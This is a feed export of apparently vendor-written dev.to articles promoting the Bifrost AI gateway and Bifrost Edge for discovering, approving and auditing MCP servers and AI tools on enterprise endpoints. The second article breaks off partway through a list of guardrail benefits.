&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Fevj5ng1dchp5jes1zv9a.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Fevj5ng1dchp5jes1zv9a.png" alt="A dark, abstract network of interconnected nodes and obscured data packets, symbolizing shadow AI activity and hidden ri" width="800" height="457"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;The rise of shadow AI in development teams means that many agent-to-system integrations operate without security review, creating uninventoried blind spots where these risks can materialize undetected.&lt;/p&gt;

&lt;h2&gt;
  
  
  Bridging the Gap with Endpoint AI Governance
&lt;/h2&gt;

&lt;p&gt;To effectively mitigate these risks, organizations must implement robust AI governance that extends beyond the network perimeter to the endpoint where AI tools are actually used. Endpoint AI governance ensures that controls are applied directly on the device, covering desktop applications, browser-based AI, and coding agents.&lt;/p&gt;

&lt;p&gt;A comprehensive approach to governing AI on the endpoint integrates with an AI gateway as the central control plane. The &lt;a href="https://www.getmaxim.ai/bifrost" rel="noopener noreferrer"&gt;Bifrost&lt;/a&gt; AI gateway serves as the policy engine, where virtual keys, budgets, rate limits, routing, guardrails, and audit logs are configured. &lt;strong&gt;Bifrost Edge&lt;/strong&gt; then extends that same governance to the endpoint, ensuring that AI traffic on every machine adheres to the established policies. This combined "AI Gateway + Bifrost Edge" narrative is critical for achieving consistent and enforceable AI security. Beyond routing, Bifrost applies &lt;a href="https://www.getmaxim.ai/bifrost/resources/governance" rel="noopener noreferrer"&gt;governance&lt;/a&gt; and security controls (virtual keys, budgets, guardrails, audit logs) centrally, and &lt;a href="https://www.getmaxim.ai/bifrost/edge" rel="noopener noreferrer"&gt;Bifrost Edge&lt;/a&gt; extends that same governance and security to AI traffic on employee machines, with &lt;a href="https://docs.getbifrost.ai/edge/security" rel="noopener noreferrer"&gt;endpoint enforcement&lt;/a&gt; on each device.&lt;/p&gt;

&lt;h2&gt;
  
  
  Fleet-Wide MCP Server Discovery and Control with Bifrost Edge
&lt;/h2&gt;

&lt;p&gt;Bifrost Edge is an endpoint agent that runs on every computer in an organization, transparently routing all AI traffic through the company's Bifrost gateway. This enables comprehensive visibility and control over MCP server usage.&lt;/p&gt;

&lt;p&gt;One of Bifrost Edge's core capabilities is its ability to &lt;strong&gt;inventory and govern MCP servers&lt;/strong&gt; [&lt;a href="https://docs.getbifrost.ai/edge/mcp-governance" rel="noopener noreferrer"&gt;https://docs.getbifrost.ai/edge/mcp-governance&lt;/a&gt;]. It automatically discovers the MCP servers configured within each AI application across the entire fleet, creating a live, centralized inventory for administrators. This provides the crucial visibility needed to answer the question: "What MCP servers are running on our fleet?"&lt;/p&gt;

&lt;p&gt;Administrators can then make &lt;strong&gt;per-server allow/deny decisions&lt;/strong&gt; through a centralized approvals dashboard [&lt;a href="https://docs.getbifrost.ai/edge/admin-approvals" rel="noopener noreferrer"&gt;https://docs.getbifrost.ai/edge/admin-approvals&lt;/a&gt;]. A denied MCP server is actively blocked on the device, preventing any data from leaving the machine via that server, even if the application had it configured previously. This enforcement applies to a wide range of coding agents, including Claude Code, Claude Desktop, Gemini CLI, OpenCode, Codex, and Cursor [&lt;a href="https://docs.getbifrost.ai/edge/supported-applications" rel="noopener noreferrer"&gt;https://docs.getbifrost.ai/edge/supported-applications&lt;/a&gt;]. When Edge detects a new MCP server or application, it automatically requests approval in the admin console, allowing for proactive governance [&lt;a href="https://docs.getbifrost.ai/edge/app-governance" rel="noopener noreferrer"&gt;https://docs.getbifrost.ai/edge/app-governance&lt;/a&gt;].&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Fjz1rwn60zmuqwgn0xcpy.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Fjz1rwn60zmuqwgn0xcpy.png" alt="A unified, clean interface or dashboard, visually representing Bifrost Edge's fleet-wide discovery and control of MCP se" width="800" height="457"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  Centralized Policy, Decentralized Enforcement
&lt;/h2&gt;

&lt;p&gt;With Bifrost Edge, the existing governance framework defined within the Bifrost AI gateway seamlessly extends to the endpoint. This means that virtual keys, budget allocations, rate limits, and guardrails configured in Bifrost automatically apply to prompts and responses from desktop apps, browser AI, and coding agents [&lt;a href="https://docs.getbifrost.ai/edge/security" rel="noopener noreferrer"&gt;https://docs.getbifrost.ai/edge/security&lt;/a&gt;].&lt;/p&gt;

&lt;p&gt;Guardrails, which are configured using reusable profiles and rules at the gateway level [&lt;a href="https://docs.getbifrost.ai/enterprise/guardrails" rel="noopener noreferrer"&gt;https://docs.getbifrost.ai/enterprise/guardrails&lt;/a&gt;], detect and prevent sensitive content—such as secrets or PII—from leaving the machine. This includes native &lt;strong&gt;Secrets Detection&lt;/strong&gt; (Gitleaks-backed) and &lt;strong&gt;Custom Regex&lt;/strong&gt; capabilities, as well as integrations with third-party guardrail providers like AWS Bedrock Guardrails, Azure Content Safety, CrowdStrike AIDR, GraySwan Cygnal, and Patronus AI [&lt;a href="https://docs.getbifrost.ai/enterprise/guardrails" rel="noopener noreferrer"&gt;https://docs.getbifrost.ai/enterprise/guardrails&lt;/a&gt;].&lt;/p&gt;

&lt;p&gt;Every AI request, whether from a centrally configured application or an endpoint coding agent, inherits the organization's comprehensive audit logging [&lt;a href="https://docs.getbifrost.ai/enterprise/audit-logs" rel="noopener noreferrer"&gt;https://docs.getbifrost.ai/enterprise/audit-logs&lt;/a&gt;], ensuring an immutable trail for compliance standards like SOC 2, GDPR, HIPAA, and ISO 27001.&lt;/p&gt;

&lt;h2&gt;
  
  
  Seamless Deployment and Continuous Compliance via MDM
&lt;/h2&gt;

&lt;p&gt;Rolling out endpoint AI governance across an enterprise fleet can be complex, but Bifrost Edge simplifies this through native integration with existing mobile device management (MDM) platforms. Organizations can push the Edge agent to every machine using managed configurations, eliminating the need for individual users to download or manually configure anything [&lt;a href="https://docs.getbifrost.ai/edge/deployment-mdm" rel="noopener noreferrer"&gt;https://docs.getbifrost.ai/edge/deployment-mdm&lt;/a&gt;].&lt;/p&gt;

&lt;p&gt;Bifrost Edge supports major MDM platforms, including Jamf, Microsoft Intune, Kandji, Omnissa Workspace ONE, and JumpCloud, across macOS, Windows, and Linux devices. This streamlines deployment, ensuring that machines are pre-configured to point to the organization's Bifrost instance. The setup process involves a single browser sign-in via the organization's single sign-on (SSO), linking the device to the user and syncing assigned policies without sensitive information residing on the device itself [&lt;a href="https://docs.getbifrost.ai/edge/how-it-works" rel="noopener noreferrer"&gt;https://docs.getbifrost.ai/edge/how-it-works&lt;/a&gt;].&lt;/p&gt;

&lt;p&gt;By actively governing AI at the endpoint, Bifrost Edge helps organizations:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;  &lt;strong&gt;End shadow AI:&lt;/strong&gt; Bring all user-initiated AI tool usage under governance.&lt;/li&gt;
&lt;li&gt;  &lt;strong&gt;Ensure zero per-app setup:&lt;/strong&gt; Transparently route traffic without requiring users to reconfigure individual applications.&lt;/li&gt;
&lt;li&gt;  &lt;strong&gt;Achieve compliance everywhere:&lt;/strong&gt; Extend existing security and governance policies to every laptop, aligning AI operations with regulatory requirements.&lt;/li&gt;
&lt;/ul&gt;

&lt;h2&gt;
  
  
  Securing the Future of Agentic Workflows
&lt;/h2&gt;

&lt;p&gt;The shift towards agentic coding workflows, where AI assistants interact autonomously with external tools, necessitates a proactive and comprehensive approach to governance. Relying solely on network-level controls is insufficient for the dynamic and distributed nature of modern AI tool usage.&lt;/p&gt;

&lt;p&gt;By combining the robust policy engine of the Bifrost AI gateway with the endpoint enforcement capabilities of Bifrost Edge, organizations can gain the visibility and control needed to securely embrace AI coding assistants. This integrated approach ensures that innovation in development proceeds hand-in-hand with enterprise security, compliance, and responsible AI practices. Teams evaluating AI gateways and endpoint governance solutions can &lt;a href="https://getmaxim.ai/bifrost/book-a-demo" rel="noopener noreferrer"&gt;request a Bifrost demo&lt;/a&gt; to explore these capabilities or review the &lt;a href="https://github.com/maximhq/bifrost" rel="noopener noreferrer"&gt;open-source repository&lt;/a&gt;.&lt;/p&gt;

&lt;h2&gt;
  
  
  Sources
&lt;/h2&gt;

&lt;ul&gt;
&lt;li&gt;  &lt;a href="https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQG8OB6l-tUoCb3v8Ur15aDOSGcyjyNmIq3qVLGSHxaHNPi5K1B92tKsXvFX_sdZlGo-3adIvpAbllI3ovDNbonJ54HNNYf-z9fPHb62tbx_y2QKxUmAQgAR6aJ6-z-6acsQhgVNufYz7DqMa1DYEAx4Vi9ybPw=" rel="noopener noreferrer"&gt;Model Context Protocol&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;  &lt;a href="https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQFlBGx73EOq0dfHknMH2NTOTss0x0D5nFztXpOqG84G-ET4gteo9rMEgSylS9sMeu4zC4V9dc8PbvyVyx4H2d1hH4iXiIQT3S4-jGVPUhb4vVGBGTMnoo0LgmxoxgqIvQCTYiyHoRC8ZjxVR-niQYsMhrljc6UAAoVC" rel="noopener noreferrer"&gt;What is the Model Context Protocol (MCP)? - Databricks&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;  &lt;a href="https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQE3Sl3-ZR3cOLXMk2aDhWuO32UTVCf4C-fRYezZMgkl3jOaH-DCpSMC1llYt6800lCGdYYIMbe6s7fR6d_ww0NxWkX28OtpHBDtj2L5n3o-HAdnuwGfiQtZOFLWXlRCwS4jpjRwp1E5DvfVgZjlFBA=" rel="noopener noreferrer"&gt;Model Context Protocol - Wikipedia&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;  &lt;a href="https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQGLxkqQ08RD29Ux9yE3704hbjDGJboQWn_N2BuhK9JKw9B9DfJdVKHdiX3cGyzlCeigGlUAgS6axjgKW6BxfqqgIxRsGt1FZdlLChcONcI-co66QYDX1TlTPM66RaD_OkmSa7rHRzmJGk8IzBQ1MP1mweHbTA==" rel="noopener noreferrer"&gt;Unpacking the security risks of MCP servers - Box Blog&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;  &lt;a href="https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQFsodebnR9P0yiLH_JuprVoQD24mf36QhgtgXhg_ENf7IENvLWNfcawpSa7XzaPNmzZFFGg2smh_fwPFjyNMBbJXjtx2__nAznCsT0VSy6KUtePX9NEyRc-xNVYgQ8laW45Hp-A_pwh" rel="noopener noreferrer"&gt;7 MCP Server Security Risks for Enterprises - Witness AI&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;  &lt;a href="https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQF10a2VY-u2Eq07tEIx86TNs0KECIQKCenyIys5MZRsKe5oVG8gJGcfvfdpb13pGjDoQmaiKAZszKsvV0r1bdadZdZ5uI8Vv6Hr0b0PGw5JouOa3ER-JHi65yvhXVT3AcjCjMjjwOXFcJLkXGXSRttNjbR8rFBXBA==" rel="noopener noreferrer"&gt;Model Context Protocol (MCP): A comprehensive introduction for developers - Stytch&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;  &lt;a href="https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQHr5_B7LPrhe86HXvVKNpeZELJt3AphevFSkGZa74oQstAeXlB6eEU6ETcSbQ-CZP6_FJ5pzOgpPGgA9Wu6ms9Aq4_F_-YDc53X8YTI_-9fcaqBQd9iDn64RGGBMk3jY79IWoBjjifrXwZdfAQBj6gDKRvcSimWqyjXTkAzjoaSzUf1i7pBV8FHGTRd_wF8" rel="noopener noreferrer"&gt;7 MCP Risks CISO's Should Consider and How to Prepare - Darktrace&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;  &lt;a href="https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQFDyzMgUGGxtu0jlUip2vVLddvBrNQTr69kACNwh0g0eaEbnyo8imACuBXQV9gZ9jjyMWDePQHDV1Hl4ZzEGbim8eWVGpPbZzCTjSTm-v9ws91n-gCpTUCaDAM4HUIx3zabxwD5sRbhhSc86OIFyHa3wwfUXOfGndSVV85LEwVIHxZ2KomCdpw3VNag" rel="noopener noreferrer"&gt;How to Eliminate “Shadow AI” in Software Development - SecurityWeek&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;  &lt;a href="https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQF78a0vlcY9V9y_eX1tDGABmnNusoeVk8NfaBjvocVIvlKsT-2q3QdCbos4lQ9mHKc5noQfgsVWDC9dA-U8dKlEDKRZBm0M66ACPDsbBP5fKoPrSnh97r_R9vv83pjccp4qCUkEKw==" rel="noopener noreferrer"&gt;Model Context Protocol (MCP) an overview - Philschmid&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;  &lt;a href="https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQHKBua2YfK7ZkoznQv8xp_CTGeFE4Z4lLxLxDgfxJvNa_xlwYTMYHjBJ0VlZRJJryK8Mn8fW26qBeczEdq4rSI4rRHFCuPrf6eVsatF4DTSiXiF1ZHRLSFkqMwE1NgtfqjufDLOrQ==" rel="noopener noreferrer"&gt;What Is Shadow AI? - IBM&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;  &lt;a href="https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQGvpvrZYDRTzuH1c5TiSpu4VVl9zzVruH4u8E_xNiVQkIXca4YHTTfXEHjefHckJm0IlrW69XSAPj4VLawgv4HH-b7Hqi_6cxfky4ia9H015Z20GwhBvXCud8lpHgo5ozvi-DGGMfWE5KkrsCNWdFkM1ZN4q5WfC9ayxYA7ZKeOdCzgFeCSsNlsEMLePJSzMTeM13AfJweU5yTw5Cn1qd9-o5VSXtWO8i36148=" rel="noopener noreferrer"&gt;MCP Security Exposed: What You Need to Know Now | Palo Alto Networks - LIVEcommunity&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;  &lt;a href="https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQHPbpoQFJchTFcmko2GkSJhxflu5WQSfv-adaUSO2yIHAUtCKcUDK9jin_BHs-h4qXpLuOj9cKiDpezJp5WzsvcGLgwKeYpaWosoYNzwBKn3GyVakfdhWRCr0Gy9aZGaZSeAYObynT3sF_DACeh9JOtYlBGVgnS28z9fGycj6q812ZQShPTizM-ibFX8d9jGvD_7Q==" rel="noopener noreferrer"&gt;Best Endpoint AI Governance Tools: A 2026 Buyer's Guide - Maxim AI&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;  &lt;a href="https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQFRw69QtVqE2k_u_qfHpXKuNTrQk3UjxWC_z7JdDgibEl8HOqWjhyLZiHtCGTu5FQaqq6GfNLc39Yiif9_CYof_xLKiY-r4y0CVSQr_5iN82cP11BY7HaXysSrRDayzSmE8JZ2nKPkRP-KF1gZYOFJx-iE39SxsQn4qLLM=" rel="noopener noreferrer"&gt;What is Model Context Protocol (MCP)? A guide | Google Cloud&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;  &lt;a href="https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQHncupufB5WZSS5O2oxTtDMmeQPfJqK1jNMfvogZhNMQfdO0_7syzzP0Se4E5zFzKIYC9p93VZwBl1Hwa6__CjDgH1Aji9AXv1_m_89OoBPRZYD7CebK_HAaS2-ep61IzQtJIdNyHJ7biQdW3qbVRT8CHckMn8CT6jyeuZqsu_g-nffgr0qstltY6kZTq_BTNFqHiwBc0LJJ9KCLFvuyCSSXBKROgyZsiK3_Pq7ziWxDynpNN90GFIr48t934fxeKHfFh5APbWvo-idQQ==" rel="noopener noreferrer"&gt;Enterprise AI Coding Assistants: Governance, Security, IP - McKenna Consultants&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;  &lt;a href="https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQHLQKDsgJrUIhVZi-ljAjy8SsWvhv7sG6BBpFaadKVg6PGVbYgFNXKrdwByJKcv_1RDDy5mTdr-YiWcB4M-tfWXXM2yitIhbm3q9QfFM6TKGQvi99Tcs1VJ24q8YdD_xVWkS1cyGxHEK5HSt41KANe5ELg==" rel="noopener noreferrer"&gt;What is Shadow AI &amp;amp; What Can You do About It? | Auvik&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;  &lt;a href="https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQF7tRPJAgWKOBgCmNskukYUrc5_RlYVHFJOL8vViyHhw5o_1LCDNYXOLKvI0FK0WEUo05q48_IB2IZRs9uCoU5Nau9q8_q_emTYwTb-atEV2CBPz7PpiR4C4BWv_QFsQq8TfoU6UAbEOHaXe0u-D0isGqwXPRCnUfVz6XSapuuSJy9e" rel="noopener noreferrer"&gt;Shadow AI is already writing your code - Sonar&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;  &lt;a href="https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQH65bF7kmT8VnhqpdutThj683pbcZcRkmCSJhd5yzaXxT7eZqZjBuYiXHya52JZwuBEhqbj08WXPEZKMWMUHAda0gFGP1lTtYdO8-8jO0cO7GGLqrXa-hEN6t8qGPCvGqCP8JZ1_P4UjpTpI1bBJlV0wm_Rc0a--IM=" rel="noopener noreferrer"&gt;Best AI Governance Tools in 2026 - Venn&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;  &lt;a href="https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQGPrpNM06_qtKBzPPmMtXkuP-HngCDnoLLNeph7r47BUl_HE-eiR3wYmYOjGcpHFlycXCY-dvygxTSEbqrmfKPwLitUyT5AkkaPQ0E4eyx4bJoKVMaiJ5BmtK_XA31vWWLvV4xUYVeDS1wxcM74kJP-Of8TWKaeX5SQRrFnR2gY-T-pqEzBGiAMh4PgvFE=" rel="noopener noreferrer"&gt;Shadow AI Is a Symptom of Isolation. Here's How to Avoid It. - Chronus&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;  &lt;a href="https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQHaVP7OTVAI8CVJIpRpZI4bVliVO6YzeCsZwq7iq3SZZ5ciHDwN3haF-gcl-LQ0wKwsYyF9C3K7s53E11MbJx4Qdm287PESLAtb_NJl2WNm1b9CcgflKkisTw_Px1fixxv50FiXWWfPhURC8wdFpdgILBx4Gu3KaUlV-6T1CoG4BfCCrLFOnl7edj6qFZddaBst1DONta6qwOpNx0fCoSPcHLCTvlKRys8mduGuDX8CjTI1MVOUxAFIZQ==" rel="noopener noreferrer"&gt;MDM and AI: Why Master Data Management Is Key to Agentic-Ready Workflows - Precisely&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;  &lt;a href="https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQEPGc48wHKyZ77dJJnerugX7SWC0zl-oB4W1V_jRBstE6f0mJmclvsYcG0erBXEuJKHZ49jrPWUWIgbeiGEo6I-fGr5gMiF_5zZAyIaCCqAllQiIaTCbWbw4Ka6_fHv4rx_8HXC" rel="noopener noreferrer"&gt;AI Integration US - Nexer United States&lt;/a&gt;
&lt;/li&gt;
&lt;/ul&gt;

</description>
      <category>aigovernance</category>
      <category>endpointsecurity</category>
      <category>mcp</category>
      <category>codingagents</category>
    </item>
    <item>
      <title>How Enterprises Monitor and Control Model Context Protocol Servers</title>
      <dc:creator>Marcus Chen</dc:creator>
      <pubDate>Wed, 24 Jun 2026 18:29:07 +0000</pubDate>
      <link>https://dev.to/marcuswwchen/how-enterprises-monitor-and-control-model-context-protocol-servers-4p1c</link>
      <guid>https://dev.to/marcuswwchen/how-enterprises-monitor-and-control-model-context-protocol-servers-4p1c</guid>
      <description>&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Fi7mbv333ouf6nkws1e4s.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Fi7mbv333ouf6nkws1e4s.png" alt="How Enterprises Monitor and Control Model Context Protocol Servers" width="800" height="457"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;em&gt;Enterprise AI deployments face significant challenges governing Model Context Protocol (MCP) servers used by AI agents. This article examines how organizations can gain visibility and implement robust controls for MCP usage across their fleet.&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;AI agents are rapidly transforming enterprise workflows, automating tasks and interacting with a multitude of tools. A key enabler of this functionality is the Model Context Protocol (MCP), which allows language models to discover, invoke, and interact with external services. While MCP unlocks powerful capabilities, it also introduces significant governance and security challenges for organizations. Without proper controls, IT and security teams can face a blind spot into which external tools employees' AI agents are using and the data flows involved. &lt;a href="https://www.getmaxim.ai/bifrost" rel="noopener noreferrer"&gt;Bifrost&lt;/a&gt;, an &lt;a href="https://github.com/maximhq/bifrost" rel="noopener noreferrer"&gt;open-source AI gateway&lt;/a&gt; from Maxim AI, provides a comprehensive approach to gain visibility and enforce policies over MCP server usage within an enterprise.&lt;/p&gt;

&lt;h2&gt;
  
  
  The Rise of Model Context Protocol (MCP) and Agentic AI
&lt;/h2&gt;

&lt;p&gt;The Model Context Protocol (MCP) defines a standard for how large language models (LLMs) and AI agents can interact with external tools and services. Instead of merely generating text, an AI agent leveraging MCP can read files, call APIs, and execute actions by connecting to specialized MCP servers. This capability is foundational for agents to perform complex, multi-step tasks that require real-world interaction, such as summarizing documents, managing calendars, or integrating with internal systems.&lt;/p&gt;

&lt;p&gt;As agentic AI becomes more prevalent, so does the reliance on MCP servers. These servers can be internal (connecting to company APIs) or external (integrating with third-party services). The power of MCP lies in its extensibility, allowing agents to become more versatile and effective. However, this extensibility also presents a governance paradox for enterprises: how can organizations permit the innovative use of agents while maintaining control over data, security, and compliance?&lt;/p&gt;

&lt;h2&gt;
  
  
  The Shadow AI Problem: Ungoverned MCP Servers
&lt;/h2&gt;

&lt;p&gt;The primary challenge for enterprises is the proliferation of "shadow AI." This refers to AI tool usage by employees that occurs outside the visibility and control of IT and security teams. When employees install popular AI desktop chat applications (such such as Claude Desktop or Cursor), utilize coding agents in their terminals (like Claude Code or Gemini CLI), or interact with AI in their browsers, they may configure connections to various MCP servers without explicit oversight. These tools often allow users to specify arbitrary MCP server URLs.&lt;/p&gt;

&lt;p&gt;This ungoverned usage creates significant risks:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;  &lt;strong&gt;Data Exfiltration:&lt;/strong&gt; Sensitive company data could inadvertently be sent to unsanctioned external MCP servers.&lt;/li&gt;
&lt;li&gt;  &lt;strong&gt;Security Vulnerabilities:&lt;/strong&gt; Malicious or compromised MCP servers could introduce security risks to the corporate network or data.&lt;/li&gt;
&lt;li&gt;  &lt;strong&gt;Compliance Gaps:&lt;/strong&gt; Without an audit trail or policy enforcement, organizations cannot demonstrate compliance with regulations like SOC 2, GDPR, HIPAA, or ISO 27001 regarding AI usage.&lt;/li&gt;
&lt;li&gt;  &lt;strong&gt;Cost Overruns:&lt;/strong&gt; Uncontrolled agent activity can lead to unexpected costs from third-party services.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;A traditional AI gateway can only govern traffic that is explicitly routed through it. MCP servers configured directly on an employee's machine bypass this central control, creating a critical blind spot that most enterprises are unprepared to address.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Fid2ux4ack1n8e9kapf1l.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Fid2ux4ack1n8e9kapf1l.png" alt="A chaotic scene of numerous laptops and desktops with various AI chat interfaces open, depicting a 'shadow AI' problem w" width="800" height="457"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  Gaining Visibility: Inventory and Discovery of MCP Servers
&lt;/h2&gt;

&lt;p&gt;The first step in controlling MCP server usage is to understand what exists. Manually inventorying every MCP server configured across a fleet of employee machines is an impractical task. Enterprises need automated mechanisms to discover and catalog these connections.&lt;/p&gt;

&lt;p&gt;Bifrost Edge, the endpoint AI governance component of the Bifrost AI gateway, addresses this by running an agent natively on macOS, Windows, and Linux devices. This agent automatically identifies AI applications and the MCP servers configured within them. Edge builds a live, fleet-wide inventory of all MCP server connections. This capability allows security and IT teams to answer critical questions such as: "Which MCP servers are currently active across our endpoints?" or "Are employees connecting to any unsanctioned external tools via AI agents?"&lt;/p&gt;

&lt;p&gt;The collected data is then centralized in the Bifrost admin console, providing a consolidated view of all discovered applications and MCP servers. This ensures that no MCP server connection goes unnoticed, giving administrators the visibility needed to begin formulating and enforcing policies. Edge's &lt;a href="https://docs.getbifrost.ai/edge/mcp-governance" rel="noopener noreferrer"&gt;MCP governance features&lt;/a&gt; provide this discovery, covering major AI apps that support MCP.&lt;/p&gt;

&lt;h2&gt;
  
  
  Implementing Control: Centralized Governance for MCP Usage
&lt;/h2&gt;

&lt;p&gt;Once visibility is established, the next step is to implement robust controls. Bifrost, acting as the central AI gateway and policy engine, combined with Bifrost Edge enforcing those policies at the endpoint, provides a comprehensive governance framework.&lt;/p&gt;

&lt;p&gt;The Bifrost AI gateway is where virtual keys, budgets, rate limits, routing, guardrails, and audit logs are configured. &lt;a href="https://www.getmaxim.ai/bifrost/edge" rel="noopener noreferrer"&gt;Bifrost Edge&lt;/a&gt; then extends this governance to every machine. This means the same policies that apply to AI traffic routing through the gateway also apply to AI traffic originating from endpoint applications, including their MCP server interactions.&lt;/p&gt;

&lt;p&gt;For MCP server control, administrators can leverage the Bifrost admin console to:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;  &lt;strong&gt;Approve or Deny MCP Servers:&lt;/strong&gt; After discovery, each unique MCP server found across the fleet appears in a catalog. Administrators can then make explicit per-server allow or deny decisions. A denied server cannot be used, even if an AI application on an endpoint was previously configured to connect to it.&lt;/li&gt;
&lt;li&gt;  &lt;strong&gt;Govern AI Applications:&lt;/strong&gt; Beyond individual MCP servers, administrators can also define which AI applications themselves are permitted for use on company machines. Edge enforces these policies, ensuring only sanctioned applications can operate.&lt;/li&gt;
&lt;li&gt;  &lt;strong&gt;Apply Policies via Virtual Keys:&lt;/strong&gt; Bifrost's &lt;a href="https://docs.getbifrost.ai/features/governance/virtual-keys" rel="noopener noreferrer"&gt;virtual keys&lt;/a&gt; allow administrators to assign specific MCP tool filtering policies to different projects, teams, or individual users. This fine-grained control ensures that developers, for example, might have access to a different set of tools than a customer support team.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;The decisions made in the central Bifrost console are automatically synchronized to every Bifrost Edge agent. This ensures that policy updates take effect across the entire organization without requiring manual configuration on individual devices.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Fcg19xa1e75oh7q1nf1j1.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Fcg19xa1e75oh7q1nf1j1.png" alt="A stylized visual metaphor of a central control tower (representing the Bifrost gateway) sending out green light beams (" width="800" height="457"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  Enhancing Security and Compliance with Guardrails and Audit Logs
&lt;/h2&gt;

&lt;p&gt;Controlling which MCP servers are used is crucial, but equally important is governing the content and actions flowing through them. Bifrost extends its powerful &lt;a href="https://docs.getbifrost.ai/enterprise/guardrails" rel="noopener noreferrer"&gt;guardrail capabilities&lt;/a&gt; to endpoint AI traffic, ensuring comprehensive security and compliance.&lt;/p&gt;

&lt;p&gt;Guardrails are applied before a prompt reaches an MCP server and before its response is returned to the AI agent. This allows organizations to:&lt;/p&gt;

&lt;ul&gt;
